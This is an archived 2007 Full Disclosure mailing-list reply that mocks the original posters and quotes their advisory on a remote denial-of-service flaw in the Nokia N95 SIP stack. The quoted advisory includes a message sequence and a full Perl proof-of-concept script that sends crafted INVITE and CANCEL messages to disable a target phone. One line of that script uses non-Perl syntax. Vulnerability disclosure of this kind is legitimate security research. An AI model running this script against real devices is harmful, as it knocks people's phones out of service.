Full Disclosure mailing list archives

Re: Nokia N95 cellphone remote DoS using the SIP Stack

From: reepex <reepex () gmail com>
Date: Wed, 5 Dec 2007 13:21:06 -0600

So almighty Phd what is your thesis exactly?

To me it seems to be  'how to run a fuzzer then write crappy perl  scripts
to exploit DoS conditions'

does this properly summarize your phd credentials?

I guess  you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'

I am sure you will serve the academic community great one day when teach
"hacking" classes revolving around the latest editions of hacking exposed



On Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:

 Nokia N95 cellphone remote DoS using the SIP Stack



Severity:

High – Denial of Service



Hardware:

Nokia N95



Firmware:

Tested version: Nokia RM-159 V 12.0.013



Notification:

Vulnerability found: 11 September 2007

Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
Security Support: 19 September 2007 / None reply



Vulnerability Synopsis:

If the device has the SIP Phone client activated, a sequence of SIP
messages turn the device in an inconsistent state where the user is not able
to operate it anymore until it reboots.



The sequence of messages consists in 2 different SIP Dialogs where the
first initiates an INVITE transaction but immediately closes it (in an
anticipated manner). While, the second transaction initiates a normal INVITE
transaction that trigger the vulnerability of the target.



The sequence of messages is illustrated below.



X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12

X ------------------------- CANCEL -----------------------> Nokiav12

X <----------------- OK (to the Cancel) ------------------- Nokiav12

 X <---------------- 487 Request Terminated ---------------- Nokiav12



--------New Dialog--------



X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12

X <---------------------- 180 Trying ---------------------- Nokiav12



---- The device does not work properly anymore ----



Impact:

A remote entity can take down all the services of the cell phone



Resolution:

As we did not get any proper reply from Nokia about the subject, the best
way will be to disable the SIP Client



Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)



This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.

http://madynes.loria.fr/





Proof of Concept:



A perl script (nokiav12.pl) is attached to this mail. Before launching

it, the SIP phone has to be initialed in the target device



Command:

perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>



Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu





#!/usr/bin/perl



##################################################

# Vulnerabily discovered using KiF ~ Kiph #

# #

# Authors: #

# Humberto J. Abdelnur (Ph.D Student) #

# Radu State (Ph.D) #

# Olivier Festor (Ph.D) #

# #

# Madynes Team, LORIA - INRIA Lorraine #

# http://madynes.loria.fr #

##################################################



use IO::Socket::INET;

use String::Random;



die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"

unless ($ARGV[3]);



$targetUser = $ARGV[1];

$targetIP = $ARGV[0];



$attackerUser = $ARGV[3];

$attackerIP= $ARGV[2];



$socket=new IO::Socket::INET->new(

Proto=>'udp',

PeerPort=>5060,

PeerAddr=>$targetIP,

LocalPort=>5060);



$foo = new String::Random;

$callid= $foo->randpattern("CCccnCn");

$cseq = $foo->randregex('\d\d\d\d');



$sdp = "v=0\r

o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r

s=-\r

c=IN IP4 $attackerIP\r

t=0 0\r

m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r

a=sendrecv\r

a=ptime:20\r

a=maxptime:200\r

a=fmtp:96 mode-change-neighbor=1\r

a=fmtp:18 annexb=no\r

a=fmtp:98 0-15\r

a=rtpmap:96 AMR/8000/1\r

a=rtpmap:0 PCMU/8000/1\r

a=rtpmap:8 PCMA/8000/1\r

a=rtpmap:97 iLBC/8000/1\r

a=rtpmap:18 G729/8000/1\r

a=rtpmap:98 telephone-event/8000/1\r

a=rtpmap:13 CN/8000/1\r

";



$sdplen= length $sdp;



$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>\r

Call-ID: $callid\@$attackerIP\r

CSeq: $cseq INVITE\r

Max-Forwards: 70\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,

MESSAGE\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);

$text = '';

while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){

$socket->recv($text,1024,0);

}



$msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>;tag=1\r

Call-ID: $callid\@$attackerIP\r

CSeq: $cseq CANCEL\r

Max-Forwards: 70\r

Content-Length: 0\r

\r

";

$socket->send($msg);

time.sleep(1);

$callid= $foo->randpattern("CCccnCn");

$cseq = $foo->randregex('\d\d\d\d');

$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r

From: <sip:$attackerUser\@$attackerIP>;tag=2\r

To: <sip:$targetUser\@$targetIP>\r

Call-ID: $callid\@$attackerIP\r

CSeq: $cseq INVITE\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Max-Forwards: 70\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,

MESSAGE\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);







No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
04/12/2007 19:31

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Nokia N95 cellphone remote DoS using the SIP Stack Radu State (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
  - Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
    - Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
    - Re: Nokia N95 cellphone remote DoS using the SIP Stack nnp (Dec 05)
    - Re: Nokia N95 cellphone remote DoS using the SIP Stack Humberto Abdelnur (Dec 06)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)